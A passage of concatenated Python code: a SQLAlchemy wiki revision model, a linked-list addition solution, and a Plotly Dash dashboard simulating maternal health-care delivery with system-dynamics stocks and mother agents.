            'actual': revision.id,
            'content': content.text
        }
    def set_latest_revision(self, revision):
        """Record *revision* as this page's latest and commit."""
        self.revision_latest = revision.id
        db.session.add(self)
        db.session.commit()
class Content(db.Model):
    """The text body of a single revision."""
    __tablename__ = 'content'
    id = Column(Integer, primary_key=True, autoincrement=True)
    text = Column(Text)
    # use_alter breaks the circular Content<->Revision FK dependency at
    # table-creation time.
    revision_id = Column(Integer, ForeignKey('revision.id', use_alter=True,
                                             name='revision_fk'))
    revision = relationship("Revision", backref="content",
                            foreign_keys="Revision.content_id")
    def add_revision(self, revision):
        """Point this content at its owning *revision* and commit."""
        self.revision_id = revision.id
        db.session.add(self)
        db.session.commit()
class Revision(db.Model):
    """Join row tying a Page to one Content snapshot; at most one per page is 'actual'."""
    __tablename__ = 'revision'
    id = Column(Integer, primary_key=True, autoincrement=True)
    page_id = Column(Integer,
                     ForeignKey('page.id', use_alter=True, name='page_fk'))
    content_id = Column(Integer, ForeignKey('content.id', use_alter=True,
                                            name='content_fk'))
    # True for the revision currently served for the page.
    actual = Column(Boolean)
    add_date = Column(DateTime,
                      nullable=False,
                      default=datetime.utcnow
                      )
    def set_as_actual(self):
        """Make this the page's only 'actual' revision; return a summary dict."""
        # Clear the flag on every sibling revision of the same page first.
        db.session.query(Revision).filter_by(page_id=self.page_id).update(
            {'actual': False})
        self.actual = True
        db.session.add(self)
        db.session.commit()
        return {
            'id': self.id,
            'add_date': self.add_date,
            'page_id': self.page_id,
            'actual': self.actual,
            'text': self.content.text,
            'title': self.page.title
        }
|
# Definition for singly-linked list.
class ListNode:
    """A single node of a singly-linked list."""

    def __init__(self, x):
        self.val = x
        self.next = None


class Solution:
    def addTwoNumbers(self, l1, l2):
        """Add two non-negative integers stored as reversed-digit lists.

        Each list holds one digit per node, least-significant digit first
        (e.g. 342 is 2 -> 4 -> 3). Returns the sum in the same format.
        Fixes over the original: no bare ``except: pass`` to detect list
        ends, and empty (None) inputs no longer crash on ``.val`` access.

        :type l1: ListNode
        :type l2: ListNode
        :rtype: ListNode
        """
        dummy = ListNode(0)  # sentinel so the loop needs no head special-case
        tail = dummy
        carry = 0
        # Consume both lists plus any trailing carry.
        while l1 or l2 or carry:
            digit_sum = carry
            if l1:
                digit_sum += l1.val
                l1 = l1.next
            if l2:
                digit_sum += l2.val
                l2 = l2.next
            carry, digit = divmod(digit_sum, 10)
            tail.next = ListNode(digit)
            tail = tail.next
        return dummy.next
if __name__ == '__main__':
    # Demo: 342 + 465 = 807, i.e. (2->4->3) + (5->6->4) = (7->0->8).
    # Bug fix: the original passed plain Python lists ([]), which crashed
    # inside addTwoNumbers on the first `.val` attribute access.
    l1 = ListNode(2)
    l1.next = ListNode(4)
    l1.next.next = ListNode(3)
    l2 = ListNode(5)
    l2.next = ListNode(6)
    l2.next.next = ListNode(4)
    node = Solution().addTwoNumbers(l1, l2)
    digits = []
    while node:
        digits.append(node.val)
        node = node.next
    print(digits)
|
import dash
from dash import html, dcc
from dash.dependencies import Input, Output, State, MATCH, ALL
import dash_bootstrap_components as dbc # conda install -c conda-forge dash-bootstrap-components
import pandas as pd
import numpy as np
import plotly.graph_objects as go
import random
from Mother import Mother
from Dash_ODE_Methods import logistic, many_sliders, make_slider
random.seed(10)

# INITIALIZE DATA FOR CLASS MOTHER
# read file of data with columns 1-4 [Mother]: wealth, education, age, number of children
# simulate for health, gestational age, predisposition for ANC
df = pd.read_excel("SDR_Mother.xlsx")
wealth = df['Wealth'].to_numpy()
education = df['Education'].to_numpy()
age = df['Age'].to_numpy()
no_children = df['No_children'].to_numpy()

n_repeat = 1  # n_repeat greater than 1 makes the code run slow, it is better to repeat in the Excel file
# Bug fix: the original ran `repeat(n_repeat)` inside `for i in range(n_repeat)`,
# scaling the data by n_repeat**n_repeat instead of n_repeat, and repeated
# `wealth` an extra time besides. A single repeat per array is the intent
# (with n_repeat == 1 both versions were identity).
if n_repeat > 1:
    wealth = wealth.repeat(n_repeat)
    education = education.repeat(n_repeat)
    age = age.repeat(n_repeat)
    no_children = no_children.repeat(n_repeat)

no_mothers = len(age)
# quality = 0.7
proximity = 0.8
# CLASS MOTHER
# class Mother_simple():
# def __init__(self, urban=True, wealth=False):
# self.urban = urban # True or False
# self.wealth = wealth
# self.proportion_healthy = 0.4
# self.proportion_d_home = 0.3
# rand = np.random.random(1)[0]
# if rand < self.proportion_d_home:
# self.prefer_d_home = True
# else:
# self.prefer_d_home = False
# self.QoC_threshold = 0.3
# self.QoC_home = 0.1
# self.QoC_healthy_mother_threshold = 0.03
# self.QoC_healthy_baby_threshold = 0.04
#
# def health_BL(self):
# if np.random.random(1)[0] < self.proportion_healthy:
# health_status_at_BL = 1;
# else:
# health_status_at_BL = 0;
# return health_status_at_BL
#
# def decide(self, QoC_2, QoC_4):
# if self.proportion_d_home and QoC_2 < self.QoC_threshold and QoC_4 < self.QoC_threshold:
# self.decision = 0
# elif QoC_2 < QoC_4:
# self.decision = 2
# else:
# self.decision = 1
# return self.decision # e.g., 0=home delivery, 1=2/3 delivery, 2=4/5 delivery
#
# def health_outcome(self, QoC_2, QoC_4):
# QoCs = (self.QoC_home, QoC_2, QoC_4)
# QoC = QoCs[self.decision]
# QoC_received = QoC * np.random.random(1)[0]
# if self.QoC_healthy_mother_threshold < QoC_received:
# health_outcome_of_mother = 0
# else:
# health_outcome_of_mother = 1
#
# if self.QoC_healthy_baby_threshold < QoC_received:
# health_outcome_of_baby = 0
# else:
# health_outcome_of_baby = 1
#
# return health_outcome_of_baby, health_outcome_of_mother
#
# GENERATE MOTHERS
# mothers = []
# num_mothers = 100
# proportion_wealthy = 0.1
# proportion_urban = 0.3
# for i in range(num_mothers):
# mothers.append(Mother(urban=(np.random.random(1)[0] < proportion_urban),
# wealth=(np.random.random(1)[0] < proportion_urban)))
def set_variables(X_info, name_append='', nt=0):
    """Register model variables from [name, initial_value, label] triples.

    Side effects: for each triple a module-level global ``name + name_append``
    is bound to the initial value (used by the model and the sliders); when
    ``nt > 0`` a global ``name`` is additionally bound to a length-``nt`` zero
    array that serves as the stock's time series.

    Returns (names, initial_values, labels, [[index, name], ...]).
    """
    X_names, X_0, X_label, X_idx_names = [], [], [], []
    for index, (name, initial_value, label) in enumerate(X_info):
        X_names.append(name)
        X_idx_names.append([index, name])
        X_0.append(initial_value)
        X_label.append(label)
        globals()[name + name_append] = initial_value  # e.g. P_P_target = 0.8
        if nt > 0:
            globals()[name] = np.zeros(nt)  # stock time series, e.g. P_P = zeros(nt)
    return X_names, X_0, X_label, X_idx_names
# APP SETUP
# Make time array for solution
nt = 48 # number of months
# RR Resources for RMNCH
# R2 Healthcare financing (Resources for 2/3 facilities)
# R4 Healthcare financing (Resources for 4/5 facilities)
# RS SDR transition financing
# PDS Policy: Development support
# P_P, P_A, P_D
# Names, initial values
# Stock definitions: each row is [global variable name, initial value, slider label].
S_info = [
    ['P_P', 0.2, 'Political_Goodwill' ],
    ['P_A', 0.2, 'SDR_Adoption_Other_Factors' ],
    ['P_M', 0.2, 'Advocacy/Media' ],
    ['P_I', 0.2, 'Stakeholder_Involvement' ],
    ['P_SP', 0.2, 'Support_for_Policy' ],
    ['P_DP', 0.2, 'Development_Support' ],
    ['P_RR', 0.2, 'Resources_RMNCH' ],
    ['L4_HF', 0.2, 'H_Financing_4/5' ],
    ['L2_HF', 0.2, 'H_Financing_2/3' ],
    ['S_TF', 0.2, 'SDR_Transition_Financing' ],
    ['L4_HR', 0.2, 'HR_Readiness_4/5' ],
    ['L4_S', 0.2, 'Supplies/Infrastructure_4/5'],
    ['L2_HR', 0.2, 'HR_Readiness_2/3' ],
    ['L2_S', 0.2, 'Supplies/Infrastructure_2/3'],
    ['S_T', 0.2, 'SDR_HR_Training' ],
    ['S_FR', 0.2, 'SDR_Facility_Repurposing' ],
    ['L4_DC', 0.4, 'Delivery_Capacity_4/5' ],
    ['L2_DC', 0.9, 'Delivery_Capacity_2/3' ],
    ['P_D', 0.6, 'Performance_Data' ],
    ['L4_Q', 0.5, 'Quality_4/5' ],
    ['L2_Q', 0.1, 'Quality_2/3' ],
    ]
# nt > 0 makes set_variables also allocate a zeros(nt) time series per stock.
S_names, S_0, S_label, S_idx_names = set_variables(S_info, nt=nt)
# FACTORS
# Names, initial values
# Positive factors: each row is [global variable name, initial value, slider label].
FP_info = [
    ['Funding_MNCH', 0.2, 'Funding_MNCH' ],
    ['Support_Linda_Mama', 0.2, 'Support_Linda_Mama' ],
    ['Prioritization_MNCH', 0.2, 'Prioritization_MNCH' ],
    ['Adherence_budget', 0.2, 'Adherence_budget' ],
    ['Employee_incentives', 0.2, 'Employee_incentives' ],
    ['Visibility', 0.2, 'Visibility' ],
    ['Timely_promotions', 0.2, 'Timely_promotions' ],
    ['Action_depletion', 0.2, 'Action_depletion' ],
    ['Increase_awareness', 0.2, 'Increase_awareness' ],
    ['Strong_referrals', 0.2, 'Strong_referrals' ],
    ['Training_incentives', 0.2, 'Training_incentives' ],
    ['Pos_supply_chain', 0.2, 'Pos_supply_chain' ],
    ['Increase_awareness_address_myths', 0.2, 'Increase_awareness_address_myths'],
    ]
# Bug fix: in both combination tables the second row reused the first row's
# variable name (INCREASE_ALL_P / DECREASE_ALL_N), so the "SOME" entry
# silently clobbered the "ALL" global registered by set_variables. The names
# now match their labels.
FP_combination_info = [
    ['INCREASE_ALL_P', 0.0, 'INCREASE_ALL_P'],
    ['INCREASE_SOME_P', 0.0, 'INCREASE_SOME_P'],
    ]
FN_combination_info = [
    ['DECREASE_ALL_N', 0.0, 'DECREASE_ALL_N'],
    ['DECREASE_SOME_N', 0.0, 'DECREASE_SOME_N'],
    ]
# Negative factors.
FN_info = [
    ['Delayed_disbursement', 0.2, 'Delayed_disbursement' ],
    ['Lack_promotion', 0.2, 'Lack_promotion' ],
    ['Lack_action_depletion', 0.2, 'Lack_action_depletion'],
    ['Inadequate_financing', 0.2, 'Inadequate_financing' ],
    ['Lack_adherence_budget', 0.2, 'Lack_adherence_budget'],
    ['Delay_hiring', 0.2, 'Delay_hiring' ],
    ['Frequent_transfer', 0.2, 'Frequent_transfer' ],
    ['Burn_out', 0.2, 'Burn_out' ],
    ['Poor_management', 0.2, 'Poor_management' ],
    ['Neg_supply_chain', 0.2, 'Neg_supply_chain' ],
    ]
FP_names, FP_0, FP_label, FP_idx_names = set_variables(FP_info)
FP_combination_names, FP_combination_0, FP_combination_label, FP_combination_idx_names = \
    set_variables(FP_combination_info)
FN_names, FN_0, FN_label, FN_idx_names = set_variables(FN_info)
FN_combination_names, FN_combination_0, FN_combination_label, FN_combination_idx_names = \
    set_variables(FN_combination_info)
# Beta coefficients: each row is [global variable name, initial value, slider label].
B_info = [
    # Bug fix: this entry was registered as 'L_Capacity_factor', but calc_y
    # reads the global BL_Capacity_factor when computing delivery capacity,
    # which would raise NameError at runtime. The registered name now matches
    # the name the model actually uses.
    ['BL_Capacity_factor', 20, 'BL_Capacity_Factor' ],
    ['Initial_Negative_Predisp', 2, 'Initial_Negative_Predisp'],
    ['Health_outcomes__Predisp', 2.4, 'Health outcome -> Predisp hospital'],
    ['L4_Q__Predisp', 0.5, 'L4/5 quality -> Predisp hospital' ],
    ['Health_Predisp', 0.2, 'Health_Predisp -> Predisp hospital'],
    ['Predisp_ANC_const_0', 0.4, 'Predisp_ANC_const_0'],
    ['Predisp_ANC_slope_0', 0.2, 'Predisp_ANC_slope_0'],
    ['Predisp_L2_L4', 4., 'Predisp_L2_L4'], # 1
    ['Wealth__Predisp', 0.2, 'Wealth__Predisp'], # 0.2
    ['Education__Predisp', 0.02, 'Education__Predisp'], # 0.02
    ['Age__Predisp', 0.001, 'Age__Predisp'], # 0.001
    ['No_Children__Predisp', 0.05, 'No_Children__Predisp'], # 0.05
    ['Proximity__Predisp', 0.1, 'Proximity__Predisp'], # 0.1
    ['Health_const_0', 0.8, 'Health_const_0'],
    ['Health_slope_0', 0.2, 'Health_slope_0'],
    ['Q_Health_multiplier', 10., 'Q_Health_multiplier'], # 6
    ['Q_Health_L4_constant', 1.5, 'Q_Health_L4_constant'], # 1.5
    ['Q_Health_L4_L2_difference', 1., 'Q_Health_L4_L2_difference'], # 1
    ['Q_Health_L4_referral_difference', 0.5, 'Q_Health_L4_referral_difference'], # 0.5
    ['Q_Health_Home_negative', 10.0, 'Q_Health_Home_negative'], # 0.5
    ]
B_names, B_0, B_label, B_idx_names = set_variables(B_info)
# MODEL PARAMETER INFORMATION FOR SLIDERS
# Constant coefficients (mostly stock targets): [name, initial value, label].
C_info = [
    ['P_P_target', 0.8, 'Political_Goodwill_target'],
    ['P_D_target', 0.7, 'Data_Performance_target'],
    ['L2_HF_target_0', 0.8, 'L2/3_HC_Financing_target'],
    ['L2_target_0', 0.9, 'L2_target_0'],
    ['L4_target_0', 0.9, 'L4_target_0'],
    ['S_FR_target_0', 0.7, 'S_FR_target_0'],
    ['S_T_target_0', 0.9, 'S_T_target_0'],
    ['dL2_DC_in_0', 0.2, 'dL2_DC_in_0'],
    ['dL4_DC_in_0', 0.2, 'dL4_DC_in_0'],
    ['P_DP_target', 0.7, 'P_DP_target'],
    ['P_M_target', 0.7, 'P_M_target'],
    ['P_I_target', 0.6, 'P_I_target'],
    ['P_RR_target_0', 1.0, 'P_RR_target_0'],
    ['L4_HF_target_0', 0.8, 'L4_HF_target_0'],
    ['S_TF_target_0', 0.8, 'S_TF_target_0'],
    ['L2_DC_target', 0.1, 'L2_Delivery_Capacity_Target'],
    ['L4_DC_target', 0.9, 'L4_Delivery_Capacity_Target'],
    ]
# SET UP OTHER INTERMEDIATE PYTHON VARIABLES FOR THE MODEL AND SLIDERS
C_names, C_0, C_label, C_idx_names = set_variables(C_info)
def set_F_change(F_0):
    """Return two independent float arrays initialized from *F_0*.

    ``F_original`` keeps the hard-coded defaults; ``F_change`` is the copy
    that the sliders later overwrite.
    """
    F_original = np.array(F_0, dtype=float)  # hard-coded values from F_info
    F_change = F_original.copy()             # independent buffer, not an alias
    return F_original, F_change
FP_original, FP_change = set_F_change(FP_0)  # positive-factor defaults / slider copies
FN_original, FN_change = set_F_change(FN_0)  # negative-factor defaults / slider copies
y_0 = S_0  # initial stock vector
def get_factors_0():
    # Accessor so the Dash callbacks can re-read the hard-coded factor defaults.
    return FP_0, FN_0
def calc_y(S_values, FP_values, FN_values, B_values, C_values, P_values): # values from the sliders
    """Run the hybrid system-dynamics / agent-based simulation over nt months.

    S_values: initial stock values; FP/FN_values: positive/negative factor
    slider values; B_values: beta coefficients; C_values: constant targets;
    P_values: meta parameters [t_change, beta]. Heavy use of module globals:
    stock/factor/coefficient names from the *_idx_names tables are bound via
    globals() and the stock update step is evaluated with eval().

    Returns (t_all, y_t, [delivery counts and capacities], [pos_HO, neg_HO]).
    """
    # P_values = parameter values
    for i in range(len(FP_values)): # for each F-slider
        FP_change[i] = FP_values[i] # F-parameter that is collected from the slider
    for i in range(len(FN_values)): # for each F-slider
        FN_change[i] = FN_values[i] # F-parameter that is collected from the slider
    parameters['t_change'] = P_values[0] # slider value for time when the parameters change
    parameters['beta'] = P_values[1] # slider value for beta
    beta = parameters['beta'] / 10
    y_t = np.zeros((nt,len(S_values)))
    t_all = np.zeros(nt)
    # Per-month agent snapshots keyed by month index (dicts, seeded at t=0).
    anc_t, health_t, gest_age_t, deliveries, facilities = {0:[0]}, {0:[0]}, {0:[0]}, {0:[0]}, {0:[0]}
    # anc_t, health_t, gest_age_t, deliveries, facilities = [[]]*nt, [[]]*nt, [[]]*nt, [[]]*nt, [[]]*nt # NG
    num_deliver_home, num_deliver_2, num_deliver_4, num_deliver_total = \
        np.zeros(nt), np.zeros(nt), np.zeros(nt), np.zeros(nt)
    # pos/neg health outcomes per facility class (columns: L4/5, L2/3, home, total).
    pos_HO, neg_HO, L2_D_Capacity, L4_D_Capacity = np.zeros([nt,4]), np.zeros([nt,4]), np.ones(nt), np.ones(nt)
    for i in range(len(S_values)):
        y_t[0,i] = S_values[i]
    for idx,name in S_idx_names:
        globals()[name][0] = S_values[idx]
    B = {} # Use a dictionary so that we only need to pass B to the Mother class
    for idx,name in B_idx_names:
        B[name] = B_values[idx] # B['Health_outcomes__Predisp'] = 2.4
        globals()[name] = B_values[idx] # Health_outcomes__Predisp = 2.4
    for idx,name in C_idx_names:
        globals()[name] = C_values[idx] # P_P_target = 0.8
    mothers = []
    for mother in range(0, no_mothers):
        mothers.append(Mother(wealth[mother], education[mother], age[mother], no_children[mother], nt, B))
    # OTHER MISCELLANEOUS FACTORS
    L4_D_Capacity_Multiplier = 2
    # LOOP OVER EVERY TIME VALUE
    for t in range(0,nt-1):
        if t > parameters['t_change']: # IF TIME IS LARGER THAN THE t_change SLIDER VALUE
            for idx, name in FP_idx_names:
                globals()[name] = FP_change[idx] # then use the SLIDER value for the F-parameter, e.g., Visibility = 0.0
            for idx, name in FN_idx_names:
                globals()[name] = FN_change[idx] # then use the SLIDER value for the F-parameter, e.g., Visibility = 0.0
        else: # otherwise
            for idx, name in FP_idx_names:
                globals()[name] = FP_original[idx] # use the HARD-CODED value for the F-parameter saved in F_info
            for idx, name in FN_idx_names:
                globals()[name] = FN_original[idx] # use the HARD-CODED value for the F-parameter saved in F_info
        t_all[t+1] = t_all[t] + 1 # increment by month
        gest_age, health, anc, delivery, facility = [], [], [], [], []
        # Zero every stock's in/out flow before computing this month's flows.
        for idx,name in S_idx_names:
            d_name = 'd' + name
            globals()[d_name + '_in'] = 0.0
            globals()[d_name + '_out'] = 0.0
        # if t == 0:
        #     L2_demand = 0
        #     L4_demand = 0
        # else:
        # NOTE(review): relies on a global named BL_Capacity_factor being
        # registered via set_variables — verify B_info uses that exact name.
        L2_D_Capacity[t] = L2_DC[t] * BL_Capacity_factor
        L4_D_Capacity[t] = L4_DC[t] * BL_Capacity_factor * L4_D_Capacity_Multiplier
        L2_demand = logistic(num_deliver_2[t] / (L2_D_Capacity[t]))
        L4_demand = logistic(num_deliver_4[t] / (L4_D_Capacity[t]))
        # Cumulative negative outcomes so far; column 0 is the L4/5 bucket.
        neg_HO_t = sum(neg_HO[0:t+1,:])
        if neg_HO_t[0] == 0:
            L2_4_health_outcomes = 0
        else:
            L2_4_health_outcomes = logistic([
                neg_HO_t[1] / neg_HO_t[0],
                neg_HO_t[2] / neg_HO_t[0] ])
        # Targets and inflows for each stock this month.
        P_A_target = (P_M[t] * logistic([Visibility, Action_depletion, 1]) + P_I[t]) / 2
        P_SP_target = (P_P[t] + P_A[t] + P_D[t] * logistic([Visibility, Action_depletion, 1])) / 3
        dP_SP_in = (P_P[t] + P_A[t] + P_D[t])
        dP_A_in = (P_M[t] + P_I[t])
        P_RR_target = P_RR_target_0 * logistic([Funding_MNCH, Support_Linda_Mama, Prioritization_MNCH, -Delayed_disbursement, -Lack_adherence_budget, 3])
        dP_RR_in = P_DP[t] + P_SP[t]
        L2_HF_target = L2_HF_target_0 * P_RR[t] * logistic([Adherence_budget, -Lack_adherence_budget, -Inadequate_financing, -Delayed_disbursement, 2])
        L4_HF_target = L4_HF_target_0 * P_RR[t] * logistic([Adherence_budget, -Lack_adherence_budget, -Inadequate_financing, -Delayed_disbursement, 2])
        S_TF_target = S_TF_target_0 * P_RR[t] * logistic([Adherence_budget, -Lack_adherence_budget, -Inadequate_financing, -Delayed_disbursement, 2])
        dL2_HF_in = P_RR[t] # coefficients of these three dStock_in terms add up to 1
        dL4_HF_in = P_RR[t]
        dS_TF_in = P_RR[t]
        # dP_RR_out = dL2_HF_in + dL4_HF_in + dS_TF_in
        L2_target_combined_0 = L2_target_0 * L2_HF[t] # combined targets of L2_HR and L2_S =0.9*target of L2_HF
        # L2_target_combined_0 = L2_target_0  # combined targets of L2_HR and L2_S =0.9*target of L2_HF
        L2_HR_target = L2_target_combined_0 * logistic([Employee_incentives, -Lack_promotion, Timely_promotions, -Delay_hiring, -Frequent_transfer, -Burn_out, -Poor_management, Strong_referrals, Training_incentives, 3])
        L2_S_target = L2_target_combined_0 * logistic([-Lack_action_depletion, Pos_supply_chain, -Neg_supply_chain, -L2_demand,2])
        dL2_HR_in = L2_HF[t]
        dL2_S_in = L2_HF[t]
        # dL2_HF_out = dL2_HR_in + dL2_S_in
        L4_target_combined_0 = L4_target_0 * L4_HF[t]
        # L4_target_combined_0 = L4_target_0
        L4_HR_target = L4_target_combined_0 * logistic([Employee_incentives, -Lack_promotion, Timely_promotions, -Delay_hiring, -Frequent_transfer, -Burn_out, -Poor_management, Strong_referrals, Training_incentives, 3])
        L4_S_target = L4_target_combined_0 * logistic([-Lack_action_depletion, Pos_supply_chain, -Neg_supply_chain, -L4_demand,2])
        dL4_HR_in = L4_HF[t]
        dL4_S_in = L4_HF[t]
        # dL4_HF_out = dL4_HR_in + dL4_S_in
        S_FR_target = S_FR_target_0 * S_TF[t] * logistic([Employee_incentives, -Lack_promotion, Timely_promotions, -Delay_hiring, -Frequent_transfer, -Burn_out, -Poor_management, Strong_referrals, Training_incentives, 3])
        S_T_target = S_T_target_0 * S_TF[t] * logistic([Employee_incentives, -Lack_promotion, Timely_promotions, -Delay_hiring, -Frequent_transfer, -Burn_out, -Poor_management, Strong_referrals, Training_incentives, 3])
        dS_FR_in = S_TF[t]
        dS_T_in = S_TF[t]
        # dS_TF_out = dS_FR_in + dS_T_in
        # L2_DC_target = 0.1
        # L4_DC_target = 0.9
        dL2_DC_in = dL2_DC_in_0 * S_FR[t] # target < stock so need to reverse sign here
        dL4_DC_in = dL4_DC_in_0 * S_FR[t]
        L2_Q_target = (L2_HR_target + L2_S_target) / 2 / L2_target_combined_0 * logistic([Strong_referrals, Increase_awareness, -9*L2_demand,5])
        L4_Q_target = (L4_HR_target + L4_S_target) / 2 / L4_target_combined_0 * logistic([Strong_referrals, Increase_awareness_address_myths, -9/2*L4_demand,5])
        dL2_Q_in = (L2_HR[t] + L2_S[t])
        dL4_Q_in = (L4_HR[t] + L4_S[t])
        # Stock[t + 1] = Stock[t] * (1 + beta * (dStock_in - dStock_out)) * (Stock_target - Stock[t])
        # Apply the update rule to every stock by evaluating its name-built
        # expression; the *_target / d*_in / d*_out globals were set above.
        y_t_list = []
        for idx,name in S_idx_names:
            d_name = 'd' + name
            y_t_list.append(eval(name + '[t]'))
            globals()[name][t+1] = \
                eval(name + '[t] * (1 + beta * (' + d_name + '_in - ' + d_name + '_out)' \
                '* (' + name + '_target - ' + name + '[t]))')
        y_t[t+1,:] = np.array(y_t_list)
        # quality = (L2_Q[t+1] + L4_Q[t+1]) / 2
        l2_quality = L2_Q[t+1]
        l4_quality = L4_Q[t+1]
        P_D[t+1] = L2_4_health_outcomes
        # neg_home = neg_H0[t+1,2]
        # Agent-based step: advance every mother one month.
        L2_deliveries = 0
        for mother in mothers:
            L2_net_capacity = 1 - (L2_deliveries + 1) / L2_D_Capacity[t] # add 1 to see if one more can be delivered
            mother.increase_age(l4_quality, l2_quality, proximity, L2_4_health_outcomes,
                                L2_net_capacity, None) # don't need the last argument
            if mother.delivered:
                L2_deliveries += 1
                mother.delivered = False # reset
            # mother.increase_age(quality, proximity)
            gest_age.append(mother._gest_age) # done
            health.append(float(mother._health)) # done
            anc.append(mother._anc) # done
            delivery.append(mother._delivery)
            facility.append(mother._facility)
        gest_age_t[t+1] = gest_age
        health_t[t+1] = health
        anc_t[t+1] = anc
        deliveries[t+1] = delivery # dictionary with integer keys, can access using [idx] for idx>0
        facilities[t+1] = facility
        # New deliveries this month = change in cumulative facility counts.
        fac_t1 = np.array(facilities[t+1])
        fac_t = np.array(facilities[t])
        num_deliver_home[t+1] = sum(fac_t1 == 0) - sum(fac_t == 0)
        num_deliver_2[t+1] = sum(fac_t1 == 1) - sum(fac_t == 1)
        num_deliver_4[t+1] = sum(fac_t1 == 2) - sum(fac_t == 2)
        num_deliver_total[t+1]= num_deliver_home[t+1] + num_deliver_2[t+1] + num_deliver_4[t+1]
        del_t1 = np.array(deliveries[t+1])
        del_t = np.array(deliveries[t])
        for k in range(3):
            pos_HO[t+1,2-k] = sum((del_t1 == 1) & (fac_t1 == k)) - sum((del_t == 1) & (fac_t == k))
            neg_HO[t+1,2-k] = sum((del_t1 == -1) & (fac_t1 == k)) - sum((del_t == -1) & (fac_t == k))
        pos_HO[t+1,3] = sum(pos_HO[t+1,:3]) # totals
        neg_HO[t+1,3] = sum(neg_HO[t+1,:3])
        if t==nt-2: # last value of t, need to add to these array for plotting
            L2_D_Capacity[t+1] = L2_DC[t+1] * BL_Capacity_factor # need to fill in the last time value
            L4_D_Capacity[t+1] = L4_DC[t+1] * BL_Capacity_factor * L4_D_Capacity_Multiplier
    return t_all, y_t, \
           [ num_deliver_4, num_deliver_2, num_deliver_home, num_deliver_total, L4_D_Capacity, L2_D_Capacity ],\
           [ pos_HO, neg_HO ]
# FOR OTHER PLOTTING METHODS
# gest_age_t = pd.DataFrame.from_dict(gest_age_t)
# health_t = pd.DataFrame.from_dict(health_t)
# anc_t = pd.DataFrame.from_dict(anc_t)
# deliveries = pd.DataFrame.from_dict(deliveries)
# facilities = pd.DataFrame.from_dict(facilities)
# Bundle parameters for ODE solver
# Meta parameters, mutated by calc_y from the P_slider values.
parameters = {
    't_change':0.0,  # month after which slider factor values replace defaults
    'beta':20.0  # common rate-of-change coefficient (divided by 10 in calc_y)
}
# DASHBOARD
# Dash app with Bootstrap plus the classic codepen stylesheet.
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP,external_stylesheets[0]])
app.config.suppress_callback_exceptions = True
colors = {
    'background': '#111111',
    'text': '#1f77b4' # dark blue
}
# Slider panels: factor sliders range from 0 to 4x their default; combination
# sliders range 0..1.
FP_sliders = many_sliders(FP_label,'FP_slider',FP_0,np.zeros(len(FP_0)),
                          np.array(FP_0)*4, num_rows=3) # add 0 to 1 slider for INCREASE ALL
FP_combination_sliders = many_sliders(FP_combination_label,'FP_combination_slider',FP_combination_0,
                                      np.zeros(len(FP_combination_0)),np.ones(len(FP_combination_0)),
                                      num_rows=1, num_cols=3, width=4)
FN_sliders = many_sliders(FN_label,'FN_slider',FN_0,np.zeros(len(FN_0)),
                          np.array(FN_0)*4, num_rows=3)
FN_combination_sliders = many_sliders(FN_combination_label,'FN_combination_slider',FN_combination_0,
                                      np.zeros(len(FN_combination_0)),np.ones(len(FN_combination_0)),
                                      num_rows=1, num_cols=3, width=4)
B_sliders = many_sliders(B_label,'B_slider',B_0,np.zeros(len(B_0)),np.array(B_0)*4, num_rows=5, num_cols=4, width=3)
# many_sliders(labels, type used in Input() as an identifier of group of sliders, initial values, min, max, ...
C_sliders = many_sliders(C_label,'C_slider',C_0,np.zeros(len(C_0)),np.ones(len(C_0)), num_rows=5, num_cols=4, width=3)
# Page layout: two plot+stock-slider rows, then panels of combination,
# positive, negative, beta, constant, and meta-parameter sliders.
app.layout = html.Div(style={'backgroundColor':'#f6fbfc'}, children=[
    # Row 1: plots 1a-1c plus the first 12 initial-stock sliders.
    dbc.Row([
        dbc.Col([
            dcc.Graph(id='plot_1a',config={'displayModeBar': False})
        ],width=3),
        dbc.Col([
            dcc.Graph(id='plot_1b',config={'displayModeBar': False})
        ],width=3),
        dbc.Col([
            dcc.Graph(id='plot_1c',config={'displayModeBar': False})
        ],width=3),
        dbc.Col([
            dbc.Col(html.H5('Initial Stock Values'),width=12),
            dbc.Row([
                dbc.Col([
                    html.Div([
                        make_slider(i,S_label[i],'S_slider',S_0[i]) for i in range(0,6)
                    ]),
                ],width=6),
                dbc.Col([
                    html.Div([
                        make_slider(i,S_label[i],'S_slider',S_0[i]) for i in range(6,12)
                        # make_slider(i, S_label[i], 'S_slider', S_0[i]) for i in range(6, len(S_0))
                    ]),
                ],width=6),
            ]),
        ],width=3),
    ],className="pretty_container"),
    # Row 2: plots 2a-2c plus the remaining initial-stock sliders.
    dbc.Row([
        dbc.Col([
            dcc.Graph(id='plot_2a', config={'displayModeBar': False})
        ], width=3),
        dbc.Col([
            dcc.Graph(id='plot_2b', config={'displayModeBar': False})
        ], width=3),
        dbc.Col([
            dcc.Graph(id='plot_2c', config={'displayModeBar': False})
        ], width=3),
        dbc.Col([
            # dbc.Col(html.H5('Initial Stock Values'), width=12),
            dbc.Row([
                dbc.Col([
                    html.Div([
                        make_slider(i, S_label[i], 'S_slider', S_0[i]) for i in range(12, 18)
                    ]),
                ], width=6),
                dbc.Col([
                    html.Div([
                        make_slider(i, S_label[i], 'S_slider', S_0[i]) for i in range(18, len(S_0))
                    ]),
                ], width=6),
            ]),
        ], width=3),
    ], className="pretty_container"),
    # dbc.Row([
    #     dbc.Col(html.H5('Sensitivity'),width=3),
    #     dbc.Col([
    #         html.Button(
    #             F_label[11],
    #             id={'type':'sensitivity_variable','index':11},
    #             n_clicks=0,
    #         ),
    #     ],width=3),
    #     dbc.Col([
    #         html.Div('',id={'type':'sensitivity_output','index':11}),
    #     ], width=3),
    # ], className="pretty_container"),
    dbc.Row([
        dbc.Col([
            html.H5('Positive Combination Factors'),
            FP_combination_sliders
        ], width=6),
        dbc.Col([
            html.H5('Negative Combination Factors'),
            FN_combination_sliders
        ], width=6),
    ], className="pretty_container"
    ),
    dbc.Row([
        dbc.Col(html.H5('Positive Factors'),width=12),
        FP_sliders,
    ],className="pretty_container"
    ),
    dbc.Row([
        dbc.Col(html.H5('Negative Factors'),width=12),
        FN_sliders,
    ],className="pretty_container"
    ),
    dbc.Row([
        dbc.Col(html.H5('Beta coefficients'),width=12),
        B_sliders,
    ],className="pretty_container"
    ),
    dbc.Row([
        dbc.Col(html.H5('Constant coefficients for the model'),width=12),
        C_sliders,
    ],className="pretty_container"
    ),
    # Meta parameters consumed by calc_y via the parameters dict.
    dbc.Row([
